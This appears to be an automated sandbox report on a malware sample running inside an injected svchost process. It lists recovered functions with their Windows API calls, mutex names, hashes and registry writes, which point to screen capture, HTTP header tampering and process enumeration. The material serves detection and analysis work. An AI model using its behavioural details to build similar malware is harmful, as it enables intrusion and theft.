                                                                                                                                                                                                            • GetSystemTime.KERNEL32(?), ref: 02C98987
                                                                                                                                                                                                            • GetSystemTime.KERNEL32(?), ref: 02C989D2
                                                                                                                                                                                                            • GetSystemTime.KERNEL32(00000000,?), ref: 02C98A64
                                                                                                                                                                                                            • GetSystemTime.KERNEL32(user!965543!09C06683,?), ref: 02C98AB2
                                                                                                                                                                                                            • free.MSVCRT ref: 02C98B6F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: SystemTime$recv$freemallocselectsetsockoptsocket
                                                                                                                                                                                                            • String ID: user!965543!09C06683
                                                                                                                                                                                                            • API String ID: 2153857484-1221987485
                                                                                                                                                                                                            • Opcode ID: 49f1d266871a2e713ea10d1f790a0fcbf5d4a49dcbe9e1e26214910ee85b388a
                                                                                                                                                                                                            • Instruction ID: c92b1d76400ef9843e2e8b4eed5cff5ffa8c5a4895de51623a914c03a3318989
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 49f1d266871a2e713ea10d1f790a0fcbf5d4a49dcbe9e1e26214910ee85b388a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C91BF71A006558FDF28CF28C4987BEBBE5BB86304F04476EE5969B681E734E681CB50
                                                                                                                                                                                                            Function 02C899D0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 98libraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C899E7
                                                                                                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 02C89A0A
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02C89ADB
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02C89AEC
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 02C89AFC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressCurrentHandleModuleProcProcessVersionmemset
                                                                                                                                                                                                            • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                            • API String ID: 877405840-3024904723
                                                                                                                                                                                                            • Opcode ID: 2d8e0a6a8fff08f23e0aad92f46895f996e6a680ca94b2f21621046ed013eb6d
                                                                                                                                                                                                            • Instruction ID: ab2509dac45ebc24982450debd88eb51baa31cac6808634e6fc844e1ce05eae6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d8e0a6a8fff08f23e0aad92f46895f996e6a680ca94b2f21621046ed013eb6d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F316B30A80119ABDF39EE55C895BF973B9EF4630CF5085A9D50697340EB719B90CA81
                                                                                                                                                                                                            Function 02C77890 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90synchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GdiFlush.GDI32(?,?,?), ref: 02C77926
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C77934
                                                                                                                                                                                                            • IsBadWritePtr.KERNEL32(?,?), ref: 02C7794A
                                                                                                                                                                                                            • IsBadReadPtr.KERNEL32(00000000,?), ref: 02C77956
                                                                                                                                                                                                            • memcpy.MSVCRT(?,00000000,?), ref: 02C77963
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C77985
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FlushMutexObjectReadReleaseSingleWaitWritememcpy
                                                                                                                                                                                                            • String ID: P0Wu
                                                                                                                                                                                                            • API String ID: 3485819771-465009422
                                                                                                                                                                                                            • Opcode ID: 8171cd07da8917a43439a99d2a7210e13dec6fc51a1ddb171d100cc1c6730262
                                                                                                                                                                                                            • Instruction ID: 724dfa19468e913fa4ed040b0bc688f067e8746fae3b6580ec2c130846e12548
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8171cd07da8917a43439a99d2a7210e13dec6fc51a1ddb171d100cc1c6730262
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE31CA32E411099BCB15CF69D984BAABBB5EFC8354F2885A9EC04D7305D730E955CB90
                                                                                                                                                                                                            Function 02C7AB21 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46synchronizationthreadwindowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C7AB2F
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02C7AB54
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7AB62
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32 ref: 02C7AB97
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02C7AB9E
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02C7ABAE
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$CurrentMessageMutexObjectReleaseSendSingleThreadWait
                                                                                                                                                                                                            • String ID: P0Wu
                                                                                                                                                                                                            • API String ID: 1675675969-465009422
                                                                                                                                                                                                            • Opcode ID: d5d136a4041b7d436f771182aacef41972af81b25510e3df2a3fb617409e179f
                                                                                                                                                                                                            • Instruction ID: 03f074cc63b41d1f3aab212351704ecd20f5acd8214eb696ac11eda72c1c52d8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5d136a4041b7d436f771182aacef41972af81b25510e3df2a3fb617409e179f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35012431A81250AFCB029B24FC08FDE33A4BF84724F050BF5E8448B282D7B5A9428BC0
                                                                                                                                                                                                            Function 02C7A9A0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 37synchronizationthreadwindowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C7A9AD
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7A9CB
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32 ref: 02C7AA00
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02C7AA07
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02C7AA1B
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000005), ref: 02C7AA2A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CurrentErrorLastMessageMutexObjectReleaseSendSingleThreadWaitWindow
                                                                                                                                                                                                            • String ID: P0Wu
                                                                                                                                                                                                            • API String ID: 699575883-465009422
                                                                                                                                                                                                            • Opcode ID: b27bce4fcbca707674da6cca9773a2ca59ec8251dd11a3a9c0c98df92576ddb6
                                                                                                                                                                                                            • Instruction ID: b57c32ef7cd3355056b50e60d3a575415a9a353647a6e2fe4b6cb4813c133737
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b27bce4fcbca707674da6cca9773a2ca59ec8251dd11a3a9c0c98df92576ddb6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75014B349C0240AFE7169B20E84DBDA37A4FB98716F054BA8F5198B2D1CBB556A1CF90
                                                                                                                                                                                                            Function 02C90280 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 31synchronizationsleepCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02C9028E
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 02C9029F
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C902A6
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C902B8
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C902C9
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • P0Wu, xrefs: 02C902A6
                                                                                                                                                                                                            • Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}, xrefs: 02C90285
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutex$CloseCreateInformationReleaseSleep
                                                                                                                                                                                                            • String ID: Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0Wu
                                                                                                                                                                                                            • API String ID: 1893094850-1214925433
                                                                                                                                                                                                            • Opcode ID: f06f6f68b692b4df80c7d7f822048cac3a6d39cf8352ce90042cfbb9e9ac5f45
                                                                                                                                                                                                            • Instruction ID: 7b5619f72061de97dfb8ba50d1b1332e428a752ab455fde5046a9974113a088f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f06f6f68b692b4df80c7d7f822048cac3a6d39cf8352ce90042cfbb9e9ac5f45
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6DF0A730D826A4B7E7125BA09C0DBAE7A9CDF45B15F0046C0F805D3181D7B0861046A1
                                                                                                                                                                                                            Function 02C8A390 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 30synchronizationsleepCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}), ref: 02C8A39E
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 02C8A3AF
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C8A3B6
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8A3C8
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8A3D9
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}, xrefs: 02C8A395
                                                                                                                                                                                                            • P0Wu, xrefs: 02C8A3B6
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutex$CloseCreateInformationReleaseSleep
                                                                                                                                                                                                            • String ID: Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}$P0Wu
                                                                                                                                                                                                            • API String ID: 1893094850-3712121269
                                                                                                                                                                                                            • Opcode ID: a5663edb95a2c72d152053f0210cd614263555c4a7ddfa9d3fc34966fc3c5894
                                                                                                                                                                                                            • Instruction ID: 4841972f98751e0d98693809ac7c433629e7ee9a812505941e5fca44fe9b3815
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a5663edb95a2c72d152053f0210cd614263555c4a7ddfa9d3fc34966fc3c5894
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8F0EC31D81294F7E7125B94DC0DB9E7B5CDF0570AF004281FD0993180E7F08E1487A1
                                                                                                                                                                                                            Function 02C776E0 Relevance: 12.1, APIs: 8, Instructions: 60windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 02C776E8
                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 02C77708
                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 02C77711
                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 02C7771D
                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 02C77752
                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02C77771
                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 02C77793
                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 02C777A1
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Object$CompatibleCreateDeleteSelect$BitmapRelease
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2733039346-0
                                                                                                                                                                                                            • Opcode ID: 2bb2ac571cb401fe6b4c9584210e2ad626184bbe85346ab9c2802dc2599c5a24
                                                                                                                                                                                                            • Instruction ID: bfb34221d478f6acdaabe61e514b240ef0dadb0fc3b9fac8cb4bf5e66dc91265
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2bb2ac571cb401fe6b4c9584210e2ad626184bbe85346ab9c2802dc2599c5a24
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55110075D81240AFC74ADB68F488FA67BF8EB8D310B154A95F40AC3301D734A8658F60
                                                                                                                                                                                                            Function 02C7BB10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsWindowVisible.USER32(02C7C29D), ref: 02C7BB2F
                                                                                                                                                                                                            • GetWindowInfo.USER32(02C7C29D,?), ref: 02C7BB49
                                                                                                                                                                                                            • GetClassLongA.USER32(02C7C29D,000000E6), ref: 02C7BB9E
                                                                                                                                                                                                            • PrintWindow.USER32(02C7C29D,?,00000000), ref: 02C7BBB7
                                                                                                                                                                                                            • BitBlt.GDI32(02C7BD82,?,?,?,?,76C1BCB0,00000000,00000000,00CC0020), ref: 02C7BC5E
                                                                                                                                                                                                              • Part of subcall function 02C7CC80: GetClassNameA.USER32(?,?,00000101), ref: 02C7CC96
                                                                                                                                                                                                              • Part of subcall function 02C7B950: SendMessageA.USER32(?,?,00000004,00000000), ref: 02C7B978
                                                                                                                                                                                                              • Part of subcall function 02C7B950: GdiFlush.GDI32(00000000,?,755730D0,?,?,?,02C7843E), ref: 02C7B98E
                                                                                                                                                                                                              • Part of subcall function 02C7B950: BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 02C7B9B4
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$Class$FlushInfoLongMessageNamePrintSendVisible
                                                                                                                                                                                                            • String ID: <
                                                                                                                                                                                                            • API String ID: 2334662925-4251816714
                                                                                                                                                                                                            • Opcode ID: e4894afa2bf716a42caf37b7b11bc8e27eb5ceb2ea965b2bbc33eb65ace83cf7
                                                                                                                                                                                                            • Instruction ID: 093ccc57ffc1fd99d080eff7a680f8aef94a22716c52aaadbc85895ac9ea315c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e4894afa2bf716a42caf37b7b11bc8e27eb5ceb2ea965b2bbc33eb65ace83cf7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08413C71E00519AFCB15CF58C985AAEFBBABF84308F148259E405A7644DB30BE52CB90
                                                                                                                                                                                                            Function 02C7FBA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104networkCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7FBD3
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7FBFF
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7FC26
                                                                                                                                                                                                            • HttpAddRequestHeadersW.WININET(?,?,?,A0000000), ref: 02C7FC6C
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(?,Accept-Encoding:,00000012,A0000000), ref: 02C7FC7F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$HeadersHttpRequest
                                                                                                                                                                                                            • String ID: Accept-Encoding:
                                                                                                                                                                                                            • API String ID: 853579731-3444961765
                                                                                                                                                                                                            • Opcode ID: eae1558d97f0c1907df676c8d2acc288414731bcd5932755705afb8cacad6815
                                                                                                                                                                                                            • Instruction ID: a1939f19b0903ae485086d7e66a7c0367de7593c3fc979b1ec14221293d3a2c0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: eae1558d97f0c1907df676c8d2acc288414731bcd5932755705afb8cacad6815
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F31FFB1D4121DAFDB50DFA5D885AEEBBB9FF88310F114569ED15E7200D3749A018FA0
                                                                                                                                                                                                            Function 02C7ABD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92stringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7AC0F
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7AC3B
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7AC62
                                                                                                                                                                                                            • GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 02C7AC91
                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,92f35800a), ref: 02C7ACA7
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$InformationObjectUserlstrcmpi
                                                                                                                                                                                                            • String ID: 92f35800a
                                                                                                                                                                                                            • API String ID: 410342393-1413308398
                                                                                                                                                                                                            • Opcode ID: 35ea4937242a902a5c5d0cf1d59a717b5ec3b164cb4c847174ea150e8905d255
                                                                                                                                                                                                            • Instruction ID: 50cd088300e2c098ad6a19424ca14a86222806e7c165223fdedc0b517644ca9f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35ea4937242a902a5c5d0cf1d59a717b5ec3b164cb4c847174ea150e8905d255
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C31E1B1E40209EFDB40CFA9D885AEEBBF9FB48300F10856AE514E7240E7755A40CF90
                                                                                                                                                                                                            Function 02C8A9D6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79threadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA3E6), ref: 02C8A9F7
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8B260,02CC7DA0,00000000,00000000), ref: 02C8AA90
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8AAA8
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8AAB9
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$BackslashCloseCreateInformationPathThread
                                                                                                                                                                                                            • String ID: 6D1DA3E6$keys
                                                                                                                                                                                                            • API String ID: 3186380484-1107829881
                                                                                                                                                                                                            • Opcode ID: 2771d991d4f445e0f8a9d88fa8f6d17c7ff2f7c90c2fbd5c1e4154789060f2d3
                                                                                                                                                                                                            • Instruction ID: 31663a969f21679a839c96e740fe0cc2cd9ff88a966b516aecd0452d6e46079d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2771d991d4f445e0f8a9d88fa8f6d17c7ff2f7c90c2fbd5c1e4154789060f2d3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE214D319851455BDB22DB7499187FEB7E4DF49308F2881D9E845E7240EB71CE09CF90
                                                                                                                                                                                                            Function 02C93170 Relevance: 10.6, APIs: 7, Instructions: 72processCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C93194
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C9319F
                                                                                                                                                                                                            • Process32First.KERNEL32 ref: 02C931C5
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,?), ref: 02C931E0
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,?), ref: 02C931EC
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C93208
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C9321A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3955875343-0
                                                                                                                                                                                                            • Opcode ID: 810e14c39b12bc5e0f1888c9af17e2f18aa07edadceab16d62b3436b5ada740f
                                                                                                                                                                                                            • Instruction ID: 17a8724991fbeb8b365db2bb00f289a510eb225140cfe046ce7502c62d85ccaf
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 810e14c39b12bc5e0f1888c9af17e2f18aa07edadceab16d62b3436b5ada740f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9511D2729043916BC711DF65EC49A9BBBECEFC9360F008A59FD5483281E7309619CBE2
                                                                                                                                                                                                            Function 02C76EE6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63registryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(02C84ADF,software\microsoft,00000000,00000102,80000002,?,?,?,?,00000000,0000000A), ref: 02C76F4D
                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(80000002,92f35f97a,00000000,00000001,?,00000104,?,?,?,?,00000000,0000000A), ref: 02C76F6F
